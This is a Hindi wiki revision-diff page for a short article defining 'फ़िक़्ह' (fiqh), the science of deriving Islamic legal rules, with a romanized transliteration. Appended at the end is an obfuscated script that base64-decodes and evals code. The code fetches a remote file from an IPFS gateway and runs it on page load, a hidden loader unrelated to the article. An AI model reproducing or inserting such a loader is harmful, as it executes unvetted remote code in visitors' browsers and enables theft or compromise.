Difference between revisions of "फ़िक़्ह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "अर्थात " to "अर्थात् ")
 
Line 1: Line 1:
 
'''फ़िक़्ह''' [[अरबी भाषा]] का एक शब्द है, जिसका अर्थ समझ है।  
 
'''फ़िक़्ह''' [[अरबी भाषा]] का एक शब्द है, जिसका अर्थ समझ है।  
* इस्लामी धर्मशास्त्र, अर्थात शरीयत या [[इस्लाम धर्म|इस्लामी]] क़ानून के सुस्पष्ट नियमों को निर्धारित करने का [[विज्ञान]] है।  
+
* इस्लामी धर्मशास्त्र, अर्थात् शरीयत या [[इस्लाम धर्म|इस्लामी]] क़ानून के सुस्पष्ट नियमों को निर्धारित करने का [[विज्ञान]] है।  
 
* [[मुस्लिम]] न्यायशास्त्र के संयुक्त स्त्रोतों को उसूल अल-फ़िक़्ह कहा जाता है।
 
* [[मुस्लिम]] न्यायशास्त्र के संयुक्त स्त्रोतों को उसूल अल-फ़िक़्ह कहा जाता है।
  

Latest revision as of 07:49, 7 November 2017

fiqh arabi bhasha ka ek shabd hai, jisaka arth samajh hai.

  • islami dharmashastr, arthath shariyat ya islami qanoon ke suspasht niyamoan ko nirdharit karane ka vijnan hai.
  • muslim nyayashastr ke sanyukt strotoan ko usool al-fiqh kaha jata hai.


tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>